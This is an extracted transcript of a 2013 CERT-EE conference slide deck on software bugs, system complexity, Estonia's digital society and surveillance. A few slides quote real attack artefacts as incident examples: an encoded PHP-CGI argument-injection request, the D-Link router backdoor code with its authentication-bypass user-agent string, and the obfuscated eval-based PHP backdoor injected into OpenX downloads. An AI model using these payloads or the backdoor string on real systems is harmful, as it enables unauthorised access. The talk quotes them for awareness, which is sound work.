Post on 13-Apr-2020
transcript
2013-06-06, Tallinn
Anto Veldre, CERT-EE
“Software errors as the founding pillar
of the modern society”
My daily work:Internet Assenisation
http://www.quickresponseplumbing.org
CERT – Computer Emergency Response Team
3
NB!
Pictures' © still belong to the respective owners
Disclaimer no 1
4
Many concurrent truths
http://maddy06.blogspot.com/2012/10/six-blind-men-and-elephant.html
Disclaimer no 2
- a Finno-Ugric fuzz vs the corporate style- “вокруг да около”- “walk-around-a-topic & never touch the issue”- gangnam NLP style
http://kunstiveeb.blogspot.com
Disclaimer no 3
6
My talkaround these topics:
1 – Engineering, complexity, Q/A2 - Bugs, incidents, scandals
3 – Modern times, e- / i- / x- society4 – Where is the society moving?
5 – Social responsibility
7
Estonia
http://upload.wikimedia.org/wikipedia/commons/0/03/Kakerdaja_raba.jpg
Myths: Elbonian Nokia
9
The ugric mindset
a) population density b) water
Warning: next 2 slides!
12
Oh those Estonians :)
● 99 Estonian stereotypes– http://rs-df.com/forums/index.php?showtopic=54089
Normaalne!
13
That mighty IT country Estonia!(2007)
The pack has been numbered...
1984?not at all.
2014!Hmm, the chip is well hidden
on the back side
Use your ID-card as a loyalty card
16
Our secret weapon
– http://www.sk.ee
– http://www.id.ee
● State backed PKI● Lack of physical
offices● Full automatization
for some of the State functions
● The lifestyle● [..]
17
Our secret weapon
– http://www.sk.ee
– http://www.id.ee
● State backed PKI● Lack of physical
offices● Full automatization
for some of the State functions
● The lifestyle● [..]
Our life in Europe- Ca 3% of EU population speak non-indo-european languages. - The language relativism: we think differently.
- We believe in something, which is not necessarily God (Eurobarometer 2011) - not yet fully converted pagans?
19http://tracemedia.co.uk/portfolio/mapping-wikipedia/
We stick our noses to what/where we shouldn't
http://visualoop.com/8629/the-world-map-according-to-twitter
21
Thedeveloper'sphilosophy
22
23
A naïve approach – Howard Longstaff
24
25
Technology Readiness
26
System readiness
http://www.sercuarc.org/uploads/files/TR%20027_RT%2027_System%20Maturity%20and%20Architecture%20Assessment%20MPTs.pdf
28
Jonathan Swift mdcrawford@gmail.com says:http://www.warplife.com/jonathan-swift/books/software-problem/
● Software failure is fundamentally a human problem, not a technical one.
● Purely technical solutions fail to effect truly meaningful and lasting change.
– The Computer Problem,
– The Mental Problem,
– The Social Problem.
@againsthimself once tweeted:
"@sergeybratus: We are in the only technical discipline that is getting laws before textbooks.”
29
Complexity
31
32
33
34http://www.galaxiki.org/web/main/_blog/all/build-your-own-nasa-apollo-landing-computer-no-kidding.shtml
35
● Formally auditable:– 1000 lines of code (1kLoC)?
– 10k lines of code?
– (using some testing suite) 100k?
– Apollo 11: 145kLoC
http://en.wikipedia.org/wiki/List_of_software_bugs
36http://www.itworld.com/big-datahadoop/288893/lines-code-apollo-curiosity
37
http://en.wikipedia.org/wiki/Evaluation_Assurance_Level
● EAL1: Functionally Tested
● EAL2: Structurally Tested
● EAL3: Methodically Tested and Checked
● EAL4: Methodically Designed, Tested and Reviewed
● EAL5: Semiformally Designed and Tested
● EAL6: Semiformally Verified Design and Tested
● EAL7: Formally Verified Design and Tested
The pitfall: starting from EAL4, the security must be designed into the system, you cannot add it later
38
Pitfall no 23 – can you afford this?
Non-mature technologies...The winner takes it all !
http://theresilientearth.com/?q=content/cargo-cult-climate-science
40
The Nature
41
OSI 7 layers
+2 extra ;)
42
Back to basics ;)
43● http://www.newchrono.ru/prcv/Publ/kes-popul-eng.html
44
Route 666, Speed 177• Development of technology:
– ever faster
– it is not a fashion
– it won't stop
– next events are depending on previous events
45
New World Order?
46
Unknowns and the amplification
These two crucial conditions:
● it is complex● the constituents are
tightly intercoupled
47
2011-12-1x
– http://en.wikipedia.org/wiki/Positive_feedback
48
@NicholasTaleb - 4Q, Black Swans
49
Richards Heuer
● Why all the intel analysts missed the collapse of the Soviet Union?
● How does your mind work?
● Where & when can an analyst get wrong?
● Adjusting your input filter (hmm ...pink glasses)
https://www.cia.gov/library/center-for-the-study-of-intelligence/csi-publications/books-and-monographs/psychology-of-intelligence-analysis/index.html
50
Jay Forrester - System Dynamics
51
Mark Andrejevic- The Digital Enclosure
An interactive realm wherein every action and transaction generates information about itself.
52
How to ...
53
Suarez
54
Elsberg
e- / i- / x-society
57
Milk'n'fuel paradigm
http://y.delfi.ee/norm/102149/4987007_FZJEkH.jpeg
58
Who is the adversary?Is he thinking?
59
Who's the adversary? 2
60
Is there an adversary at all?
?
61
Really???
62
63
64
News from Bahrein
http://www.theregister.co.uk/2013/08/12/spy_bins_scrapped_from_london_streets/
66http://www.youtube.com/watch?v=SNPJMk2fgJU
Quadrotor with machine gun
67
bugserrorsfaults
How and why?
68
EXFAC03-AAS
http://www.uio.no/studier/emner/hf/ikos/EXFAC03-AAS/h05/larestoff/linguistics/
69
EXFAC03-AAS
http://www.uio.no/studier/emner/hf/ikos/EXFAC03-AAS/h05/larestoff/linguistics/
70
Optical cheats / illusions
71
Optical illusions
72
Optical illusions - bubbling
73
The reality
74
Spy phones & spy TV sets● S3 memory dev writable - /dev/exynos-mem
– http://forum.xda-developers.com/showthread.php?p=35469999#post35469999
●
http://doctorbeet.blogspot.com/2013/11/lg-smart-tvs-logging-usb-filenames-and.html
75http://obamapacman.com/2013/07/r2b2-android-phone-pin-hacking-robot/
76
Mifare vs ID brokerage
78
Independent researchers
● Satan votes at the internet?– Reproducibility?– https://www.ria.ee/e-voting-is-too-secure/
79
http://www.theregister.co.uk/2007/02/28/f22s_working_again/
http://en.wikipedia.org/wiki/List_of_software_bugs
80
1989
http://en.wikipedia.org/wiki/Phobos_program
1999
http://en.wikipedia.org/wiki/Mars_Polar_Lander
81
PHP5 CGI
● 111.111.111.111 - - [11/Nov/2013:11:11:11 +0200] "POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1" 404 226 "-" "-"
● cgin/php?-d aluon -d mod -d suhon=on -d uncts="" -d dne -d auto_pr%t -d cgi.force_redirect=0 -d t_=0 -d ut -n
http://www.string-functions.com/urldecode.aspx
82
D-Link
{
if(strstr(request->url, "graphic/") ||
strstr(request->url, "public/") ||
strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
{
return AUTH_OK;
}
}
DIR-100
DI-524
DI-524UP
DI-604S
DI-604UP
DI-604+
TM-G5240
DIR-615
http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/+WPS
83http://www.infosecurity-magazine.com/view/37266/cymru-discovers-300000-compromised-home-routers/
SoHo: @routerpwn rom-0
http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/
84
OpenX backdoor
http://blog.sucuri.net/2013/08/openx-org-compromised-and-downloads-injected-with-a-backdoor.html
this.each(function(){l=flashembed(this,k,j)}<?php /*if(e){jQuery.tools=jQuery.tools||{version:{}};jQuery.tools.version.flashembed='1.0.2';*/$j='ex'./**/'plode'; /* if(this.className...
<?php$j='explode';$_=$j(",",'strrev,str_rot13,vastPlayer');eval ( $_[1]($_[0]( $_POST[$_[2]])) );
85
Apple SSL
http://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/
87
88
The systemic risk– the bug market
● Watering Hole attack
● Defacements / pwned sites / malware distros
● Commoditized tools like Meterpreter & Metasploit
89
NSA & Snowden
90
Some latest news
All these thingzare technically possible...
92
SIGINT
93
This toilet is being monitored...
94http://www.tabularasa-euproject.org/project/pdf/Anders%20Sandberg
20500,01% GDP
95
Who shall win?* Rutkowska's principle:http://theinvisiblethings.blogspot.com/2011/04/why-us-password-revolution-wont-work.html
..the operating system can impersonate the user at will! This is because the operating system fully controls the keyboard, the mouse, and the screen.
* OS (or browser) vendor always is in a preferred position
* BSI: "some critical aspects related to specific scenarios in which Windows 8 is operated in combination with a hardware that has a TPM 2.0"
96
The Anonymous???
97http://blog.cognitivedissidents.com/2011/11/01/intro-to-hdmoores-law/
98
Future of the State
Once ...
Now ...
About the limits?
102
Organs substituted
105
http://www.forbes.com/sites/andygreenberg/2013/11/18/meet-the-assassination-market-creator-whos-crowdfunding-murder-with-bitcoins/
The Government
IT corporationsPeople, NGO's
Peter Dicken http://www.amazon.com/Global-Shift-Sixth-Edition-Changing/dp/1609180062
107
GrokLaw● A teen tweet from Viljandi:
– Curtains are being washed. Want to m*. The satellites...
GrokLaw – Canary in the coal mine: When it is no longer possible to tell the truth online sufficiently for it to exist, none of us have the freedom of speech
– http://www.groklaw.net/article.php?story=20130818120421175
● UK porn filter requires the self-incrimination:
– Pr0n?
– Terrorist materials?
108
The most moderngovernance model
● The Big Data● State Secrets● Killer Drones
Technically already feasible.A right direction?
;-)
109
Thnx!
Ask.fm?
Ask me!
Pic: http://www.imdb.com/title/tt0139809/